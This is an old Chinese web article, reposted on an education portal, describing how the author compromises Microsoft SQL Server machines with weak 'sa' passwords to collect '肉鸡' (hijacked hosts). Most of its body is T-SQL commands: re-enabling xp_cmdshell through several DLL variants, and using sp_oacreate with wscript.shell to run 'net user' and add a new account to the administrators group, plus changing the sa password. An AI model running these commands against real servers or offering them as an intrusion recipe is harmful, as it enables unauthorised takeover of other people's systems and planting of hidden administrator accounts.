黑客经验之sa弱口令强行入侵 - 育路网
报课、招生咨询电话:027-59811101/51

首页 > 武汉分站 > 计算机 > 热点新闻 >
→论坛登陆 用户名  密码  
黑客经验之sa弱口令强行入侵

作者: 发布时间:2007-11-11 16:00:16 来源:
我自己现在找肉鸡主要是找SA弱口令肉鸡到还能找到几只,但也碰到不少困难,到处查资料总算找到点有用的。

    下面这些命令要SQL分离器才能实现,下面是一些关于sa弱口令相关命令。

    注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。

    一.更改sa口令方法:

用sql综合利用工具连接后,执行命令:

exec sp_password NULL,'新密码','sa'

(提示:慎用!)

    二.简单修补sa弱口令:

方法1:查询分离器连接后执行:

if exists (select * from 
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and 
OBJECTPROPERTY(id, N'IsExtendedProc') = 1) 
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' 
GO

然后按F5键命令执行完毕。

方法2:查询分离器连接后

第一步执行:use master,

第二步执行:sp_dropextendedproc 'xp_cmdshell',

然后按F5键命令执行完毕。

    三.常见情况恢复执行xp_cmdshell:

    1 未能找到存储过程'master..xpcmdshell'。

恢复方法:查询分离器连接后,

第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,

第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',

然后按F5键命令执行完毕。

    2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)

恢复方法:查询分离器连接后,

第一步执行:sp_dropextendedproc "xp_cmdshell",

第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

然后按F5键命令执行完毕。

    3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)

恢复方法:查询分离器连接后,

第一步执行:exec sp_dropextendedproc 'xp_cmdshell'

第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

然后按F5键命令执行完毕。

四.终极方法:

    如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:

查询分离器连接后,

2000servser系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:winntsystem32cmd.exe /c net user 新用户 密
码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:winntsystem32cmd.exe /c net localgroup administrators 新用户
 /add'

    xp或2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:windowssystem32cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:windowssystem32cmd.exe /c net localgroup administrators 新用
户 /add'

    其实还有其它办法只要你扫到SA弱口令发现执行不了DOS命令基本上是他的一个扩展储存给删了,只要给他上传一个到SYSTEM32下基本上可以解决。只是这个我还没认真研究。

 育路网--武汉
 
 
                                        
评论】【加入收藏夹】【 】【打印】【关闭
 热点看台
 
·[资讯中心湖北:2008上半年英语等级考试(P ·[资讯中心春季雅思动态发布会
·[热点新闻为何08雅思总分、单项均需要保6分 ·[招生简章对外经济贸易大学国际商学院EMBA
·[招生简章中南财经政法大学EMBA(北京班第 ·[招生简章中国人民大学EMBA(高级工商管理
·[招生简章中国政法大学在职法学硕士研究生 ·[招生简章北京师范大学语言学与应用语言学
·[招生简章北京师范大学行政管理专业在职研 ·[招生简章北京师范大学教育管理研究生课程
·[招生简章北京师范大学发展心理与心理健康 ·[招生简章北京师范大学新闻传播学研究生课
·[招生简章北京师范大学思想政治教育专业在 ·[招生简章北京师范大学学前教育专业在职研
·[招生简章中央财经大学财务总监高级研修课 ·[招生简章人民大学社会学专业人力资源管理
发表评论
用户名: 密码:
验证码: 匿名发表
课程搜索:
选择分类:
课程关键字:
课程 学校
 热门课程
·曼哈顿国际英语培训课程 ·英格堡国际英语课程
·计算机硬件网络培训 ·环球新托福100分强化
·武汉朗阁雅思培训课程 ·英语考研专四专八课程
·电脑全方位培训课程 ·仁和会计培训课程
·国际财务管理师职业资格 ·国际人力资源师培训
·全国考试认证项目 ·新航道英语培训课程
 最新新闻
·[资讯中心湖北:2008上半年英语等级考试(PET
·[资讯中心春季雅思动态发布会
·[热点新闻为何08雅思总分、单项均需要保6分?
·[招生简章对外经济贸易大学国际商学院EMBA招
·[招生简章中南财经政法大学EMBA(北京班第六
·[招生简章中国人民大学EMBA(高级工商管理硕
·[招生简章中国政法大学在职法学硕士研究生课
·[招生简章北京师范大学语言学与应用语言学硕
·[招生简章北京师范大学行政管理专业在职研究
·[招生简章北京师范大学教育管理研究生课程班
湖北招生咨询热线:027-59811101/51
 育路社区            进入>>
 
学员报名服务中心:武汉市武昌区中南路10号鹏程时代大厦(世纪广场旁)916室( 交通位置图
咨询电话:武汉- 027-59811101/51 传真:027-59811151 咨询QQ:260374660
育路网-中国新锐教育社区:武汉站 | 北京站 | 上海站 | 郑州站
本站法律顾问: 邱清荣律师
育路网版权所有1999-2008 | ICP备05012189号